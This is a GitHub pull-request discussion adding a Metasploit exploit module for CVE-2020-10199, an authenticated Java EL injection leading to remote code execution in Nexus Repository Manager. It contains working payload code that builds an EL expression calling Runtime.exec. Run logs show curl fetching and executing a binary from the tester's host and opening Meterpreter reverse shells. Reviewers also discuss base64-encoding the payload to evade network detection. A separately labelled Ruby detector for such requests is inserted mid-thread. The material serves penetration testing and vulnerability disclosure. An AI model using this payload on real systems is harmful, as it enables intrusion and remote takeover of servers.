
Add Nexus Repository Manager Java EL Injection RCE (CVE-2020-10199) #13195

Merged
merged 6 commits into from
Apr 16, 2020

Conversation

wvu
Contributor

@wvu wvu commented Apr 4, 2020

You can read the writeup this module is based on: https://securitylab.github.com/advisories/GHSL-2020-011-nxrm-sonatype.

Any Windows, Linux or Macintosh operating system that can run a supported Java version will work. Other operating systems may work, but they are not tested by Sonatype.

The most widely used operating system for Nexus Repository Manager (NXRM) is Linux and therefore customers should consider it the best tested platform.

https://help.sonatype.com/repomanager3/system-requirements#SystemRequirements-HostOperatingSystem

Currently, Linux is the only supported platform for this module.

To-do

Example

msf5 exploit(linux/http/nexus_repo_manager_el_injection) > run

[*] Started reverse TCP handler on 192.168.1.3:4444
[*] Executing automatic check (disable AutoCheck to override)
[+] The target appears to be vulnerable. Nexus 3.21.1-01 is a vulnerable version.
[*] Executing command stager for linux/x64/meterpreter_reverse_tcp
[*] Logging in with admin:admin
[+] Logged in with NXSESSIONID=8b6fd077-1830-4e2b-90e8-2997d260b5c0;
[*] Using URL: http://0.0.0.0:8080/t6NXrxF
[*] Local IP: http://192.168.1.3:8080/t6NXrxF
[*] Generated command stager: ["curl -so /tmp/hgzeytII http://192.168.1.3:8080/t6NXrxF", "chmod +x /tmp/hgzeytII", "/tmp/hgzeytII", "rm -f /tmp/hgzeytII"]
[*] Executing command: curl -so /tmp/hgzeytII http://192.168.1.3:8080/t6NXrxF
[+] Successfully executed command: curl -so /tmp/hgzeytII http://192.168.1.3:8080/t6NXrxF
[*] Client 192.168.1.3 (curl/7.61.1) requested /t6NXrxF
[*] Sending payload to 192.168.1.3 (curl/7.61.1)
[*] Command Stager progress -  50.00% done (54/108 bytes)
[*] Executing command: chmod +x /tmp/hgzeytII
[+] Successfully executed command: chmod +x /tmp/hgzeytII
[*] Command Stager progress -  70.37% done (76/108 bytes)
[*] Executing command: /tmp/hgzeytII
[+] Successfully executed command: /tmp/hgzeytII
[*] Command Stager progress -  82.41% done (89/108 bytes)
[*] Executing command: rm -f /tmp/hgzeytII
[+] Successfully executed command: rm -f /tmp/hgzeytII
[*] Command Stager progress - 100.00% done (108/108 bytes)
[*] Meterpreter session 1 opened (192.168.1.3:4444 -> 192.168.1.3:53094) at 2020-04-07 19:25:38 -0500
[*] Server stopped.

meterpreter > getuid
Server username: no-user @ 282665c16215 (uid=200, gid=200, euid=200, egid=200)
meterpreter > sysinfo
Computer     : 172.17.0.2
OS           : Red Hat Enterprise Linux 8 (Linux 4.19.76-linuxkit)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter >

@wvu wvu changed the title [WIP] Add Nexus Repository Manager Java EL Injection RCE [WIP] Add Nexus Repository Manager Java EL Injection RCE (CVE-2020-10199) Apr 4, 2020

# https://www.exploit-db.com/docs/english/46303-remote-code-execution-with-el-injection-vulnerabilities.pdf
# Builds the Java EL expression that is placed into the request body; cmd is
# interpolated directly into the exec("...") string literal.
def el_payload(cmd)
  %(${"".getClass().forName("java.lang.Runtime").getMethods()[6].invoke("".getClass().forName("java.lang.Runtime")).exec("#{cmd}")})
end
Contributor


As this module does not define BadChars it might be a good idea to hard code a base64 decode in Java here, and Base64 encode cmd, presuming there is sufficient space. While Base64 encoding may increase NIDS detection, the use of java.lang.Runtime in combination with getClass and exec is more telling. Optionally, as java.lang.Runtime is a string it could also be base64 encoded, presuming sufficient space.

Contributor Author


I didn't notice any badchars, especially with to_json, but that's a valid concern.

Contributor


I didn't notice any badchars, especially with to_json, but that's a valid concern.

Presumably use of " will not end well here: exec("#{cmd}")

Contributor Author


Yeah, you're right. Looks like it's one level too deep for the to_json escaping:

[1] pry(#<Msf::Modules::Exploit__Linux__Http__Nexus_repo_manager_el_injection::MetasploitModule>)> puts json_payload('echo "hi"')
{"name":"internal","online":true,"storage":{"blobStoreName":"default","strictContentTypeValidation":true},"group":{"memberNames":["${\"\".getClass().forName(\"java.lang.Runtime\").getMethods()[6].invoke(\"\".getClass().forName(\"java.lang.Runtime\")).exec(\"echo \"hi\"\")}"]}}
=> nil
[2] pry(#<Msf::Modules::Exploit__Linux__Http__Nexus_repo_manager_el_injection::MetasploitModule>)>

Contributor


Good point, but I was thinking about what happens when the Java code is executed on the server side at both the Java level and the system shell level.

exec("echo pot"ato") will not end well.

Contributor Author


I shouldn't even be committing to this PR anymore, but I've still got some time to squeeze. I'll use the last two examples as a lead. Thanks.
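As an added example, not code from this PR or from Metasploit, here is the defender's side of the badchars and quoting discussion above: a Ruby check that walks a Nexus repository-creation JSON body and flags any string value that embeds an EL expression, reporting the reflection tokens (getClass, forName, java.lang.Runtime, exec) that the review notes are the telling part. The two request bodies are constructed; the first reuses the json_payload output quoted earlier in the thread, and the JSON paths and token list are assumptions of this example.

```ruby
require 'json'

# An EL expression wrapper, and the reflection chain the payload under
# review relies on; a benign memberNames entry contains none of these.
EL_EXPR = /\$\{.+\}/m
SUSPICIOUS_TOKENS = ['getClass', 'forName', 'java.lang.Runtime', '.exec(', 'ProcessBuilder'].freeze

# Walk a parsed JSON document, yielding [json_path, value] for every string leaf.
def each_string(node, path = '$', &blk)
  case node
  when Hash
    node.each { |k, v| each_string(v, "#{path}.#{k}", &blk) }
  when Array
    node.each_with_index { |v, i| each_string(v, "#{path}[#{i}]", &blk) }
  when String
    yield path, node
  end
end

# Returns one finding per string value that embeds an EL expression:
# { path: JSON path of the value, tokens: suspicious tokens seen in it }.
# Unparseable bodies are reported as having no findings.
def find_el_injection(body)
  findings = []
  each_string(JSON.parse(body)) do |path, str|
    next unless str.match?(EL_EXPR)
    findings << { path: path, tokens: SUSPICIOUS_TOKENS.select { |t| str.include?(t) } }
  end
  findings
rescue JSON::ParserError
  []
end

# Constructed sample bodies (not captured traffic): the first is the json_payload
# output quoted in the review above, the second a benign group-repository request.
MALICIOUS_BODY = '{"name":"internal","online":true,"storage":{"blobStoreName":"default","strictContentTypeValidation":true},"group":{"memberNames":["${\"\".getClass().forName(\"java.lang.Runtime\").getMethods()[6].invoke(\"\".getClass().forName(\"java.lang.Runtime\")).exec(\"echo \"hi\"\")}"]}}'
BENIGN_BODY = '{"name":"internal","online":true,"storage":{"blobStoreName":"default","strictContentTypeValidation":true},"group":{"memberNames":["maven-central","maven-releases"]}}'

if $PROGRAM_NAME == __FILE__
  find_el_injection(MALICIOUS_BODY).each { |f| puts "EL injection at #{f[:path]}: #{f[:tokens].join(', ')}" }
  puts "benign findings: #{find_el_injection(BENIGN_BODY).length}"
end
```

Because the check runs on the parsed JSON rather than the raw bytes, the to_json escaping discussed above does not hide the expression from it.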

Contributor


Why not ARCH_JAVA? :trollface:

Contributor Author


Funny enough, I'm actually working on a remote classloading exploit right now. So maybe. :P


@wvu wvu removed the needs-docs label Apr 4, 2020
@wvu wvu added the blocked Blocked by one or more additional tasks label Apr 4, 2020
@wvu wvu changed the title [WIP] Add Nexus Repository Manager Java EL Injection RCE (CVE-2020-10199) Add Nexus Repository Manager Java EL Injection RCE (CVE-2020-10199) Apr 4, 2020
@wvu wvu removed the blocked Blocked by one or more additional tasks label Apr 4, 2020
@wvu wvu marked this pull request as ready for review April 4, 2020 07:59
Contributor Author

@wvu wvu left a comment


If you don't want to test the changes to the other modules, that's fine. I've tested them again, all targets.

@wvu wvu force-pushed the feature/nexus branch 3 times, most recently from c7cc9ca to 60e9ae0 Compare April 10, 2020 08:07
@wvu wvu changed the title Add Nexus Repository Manager Java EL Injection RCE (CVE-2020-10199) Add Nexus Repository Manager Java EL Injection RCE (CVE-2020-10199) and backport fixes to modules Apr 10, 2020
@wvu wvu force-pushed the feature/nexus branch 4 times, most recently from 16d5fe0 to 08054bc Compare April 12, 2020 22:49
@wvu wvu changed the title Add Nexus Repository Manager Java EL Injection RCE (CVE-2020-10199) and backport fixes to modules Add Nexus Repository Manager Java EL Injection RCE (CVE-2020-10199) and backport fixes to other modules Apr 13, 2020
@wvu wvu force-pushed the feature/nexus branch 4 times, most recently from 1f31c90 to 6ff3d51 Compare April 14, 2020 19:02
@gwillcox-r7 gwillcox-r7 self-assigned this Apr 14, 2020
@gwillcox-r7
Contributor

@wvu-r7 Will take a look at this given I'm also looking into the Liferay PR, which is related.

@wvu
Contributor Author

wvu commented Apr 15, 2020

There are a lot of changes in this PR. I apologize. This should not happen in a normal PR, but the changes were related to the work I was doing (such as in #13213), and I couldn't stop myself from making them.

The modules have been retested, so don't feel the need to test everything. Or do!

If you'd like me to explain any changes, feel free to ask!

@wvu wvu force-pushed the feature/nexus branch 5 times, most recently from baf24a9 to c5b6ef1 Compare April 15, 2020 17:33
@wvu wvu changed the title Add Nexus Repository Manager Java EL Injection RCE (CVE-2020-10199) and backport fixes to other modules Add Nexus Repository Manager Java EL Injection RCE (CVE-2020-10199) Apr 15, 2020
@wvu wvu requested a review from gwillcox-r7 April 15, 2020 21:00
@wvu
Contributor Author

wvu commented Apr 15, 2020

Miscellaneous module fixes moved to #13259. Cheers!

@wvu wvu added the docs label Apr 15, 2020
Contributor

@gwillcox-r7 gwillcox-r7 left a comment


@wvu-r7 Overall looking very good. A few areas to fix up, as it seems some extra code was left in there, and I wanted some clarification on a few things; then I should be able to retest it and merge.

And comment some methods used by it.
@wvu
Contributor Author

wvu commented Apr 15, 2020

@gwillcox-r7: This is how it should look with VERBOSE unset.

msf5 exploit(linux/http/nexus_repo_manager_el_injection) > run

[*] Started reverse TCP handler on 192.168.1.3:4444
[*] Executing automatic check (disable AutoCheck to override)
[+] The target appears to be vulnerable. Nexus 3.21.1-01 is a vulnerable version.
[*] Executing command stager for linux/x64/meterpreter_reverse_tcp
[*] Logging in with admin:admin
[+] Logged in with NXSESSIONID=547a9664-8d8b-43cb-bf7d-e6c30e71c75d;
[*] Using URL: http://0.0.0.0:8080/TI0jO3EebzZ
[*] Local IP: http://192.168.1.3:8080/TI0jO3EebzZ
[+] Successfully executed command: curl -so /tmp/AsZIBdaY http://192.168.1.3:8080/TI0jO3EebzZ
[*] Client 192.168.1.3 (curl/7.61.1) requested /TI0jO3EebzZ
[*] Sending payload to 192.168.1.3 (curl/7.61.1)
[*] Command Stager progress -  51.79% done (58/112 bytes)
[+] Successfully executed command: chmod +x /tmp/AsZIBdaY
[*] Command Stager progress -  71.43% done (80/112 bytes)
[+] Successfully executed command: /tmp/AsZIBdaY
[*] Command Stager progress -  83.04% done (93/112 bytes)
[*] Meterpreter session 1 opened (192.168.1.3:4444 -> 192.168.1.3:62148) at 2020-04-15 18:10:14 -0500
[+] Successfully executed command: rm -f /tmp/AsZIBdaY
[*] Command Stager progress - 100.00% done (112/112 bytes)
[*] Server stopped.

meterpreter >

I'm running into some issues disabling VERBOSE, though, since it's being stored as a string. Seems like a resurgence of #10179/#10240. I had to change the value in Pry. :/ @adfoster-r7

@gwillcox-r7
Contributor


Hmm, odd, this looks exactly the same as the output above, so I'm not seeing what VERBOSE is adding? Unless that's the point of the example?

@wvu
Contributor Author

wvu commented Apr 15, 2020

Oh, it's different. It's less verbose. :P

@gwillcox-r7
Contributor

Confirmed that this exploit works and setup instructions are correct:

msf5 > use exploit/linux/http/nexus_repo_manager_el_injection 
msf5 exploit(linux/http/nexus_repo_manager_el_injection) > show options

Module options (exploit/linux/http/nexus_repo_manager_el_injection):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   PASSWORD   admin            yes       Nexus password
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                      yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT      8081             yes       The target port (TCP)
   SRVHOST    0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
   SRVPORT    8080             yes       The local port to listen on.
   SSL        false            no        Negotiate SSL/TLS for outgoing connections
   SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
   TARGETURI  /                yes       Base path
   URIPATH                     no        The URI to use for this exploit (default is random)
   USERNAME   admin            yes       Nexus username
   VHOST                       no        HTTP server virtual host


Payload options (linux/x64/meterpreter_reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Nexus Repository Manager <= 3.21.1


msf5 exploit(linux/http/nexus_repo_manager_el_injection) > set LHOST 192.168.1.124
LHOST => 192.168.1.124
msf5 exploit(linux/http/nexus_repo_manager_el_injection) > set RHOSTS 127.0.0.1
RHOSTS => 127.0.0.1
msf5 exploit(linux/http/nexus_repo_manager_el_injection) > exploit

[*] Started reverse TCP handler on 192.168.1.124:4444 
[*] Executing automatic check (disable AutoCheck to override)
[+] The target appears to be vulnerable. Nexus 3.21.1-01 is a vulnerable version.
[*] Executing command stager for linux/x64/meterpreter_reverse_tcp
[*] Logging in with admin:admin
[+] Logged in with NXSESSIONID=3b13e129-1044-4012-9196-5a94d5f9cd68;
[*] Using URL: http://0.0.0.0:8080/QUg9CbPGd5
[*] Local IP: http://192.168.1.124:8080/QUg9CbPGd5
[*] Client 192.168.1.124 (curl/7.61.1) requested /QUg9CbPGd5
[*] Sending payload to 192.168.1.124 (curl/7.61.1)
[+] Successfully executed command: curl -so /tmp/nVmWGeTu http://192.168.1.124:8080/QUg9CbPGd5
[*] Command Stager progress -  52.21% done (59/113 bytes)
[+] Successfully executed command: chmod +x /tmp/nVmWGeTu
[*] Command Stager progress -  71.68% done (81/113 bytes)
[+] Successfully executed command: /tmp/nVmWGeTu
[*] Command Stager progress -  83.19% done (94/113 bytes)
[+] Successfully executed command: rm -f /tmp/nVmWGeTu
[*] Meterpreter session 1 opened (192.168.1.124:4444 -> 192.168.1.124:56005) at 2020-04-15 18:51:09 -0500
[*] Command Stager progress - 100.00% done (113/113 bytes)
[*] Server stopped.

meterpreter > getuid
Server username: no-user @ 905978a0c662 (uid=200, gid=200, euid=200, egid=200)
meterpreter > shell
Process 465 created.
Channel 1 created.
pwd
/opt/sonatype/nexus
ls
NOTICE.txt
OSS-LICENSE.txt
PRO-LICENSE.txt
bin
deploy
etc
lib
public
system

Contributor

@gwillcox-r7 gwillcox-r7 left a comment


Looks good, changes approved :)

@gwillcox-r7 gwillcox-r7 merged commit 5229d2a into rapid7:master Apr 16, 2020
@wvu wvu deleted the feature/nexus branch April 16, 2020 00:31
@gwillcox-r7
Contributor

gwillcox-r7 commented Apr 16, 2020

Release Notes

A new module, modules/exploits/linux/http/nexus_repo_manager_el_injection
was added that exploits CVE-2020-10199, an authenticated Java EL Injection RCE in Nexus Repository Manager 3.x for versions 3.21.1 and prior. Successful exploitation results in RCE as the user nexus.

@tperry-r7 tperry-r7 added the rn-modules release notes for new or majorly enhanced modules label Apr 29, 2020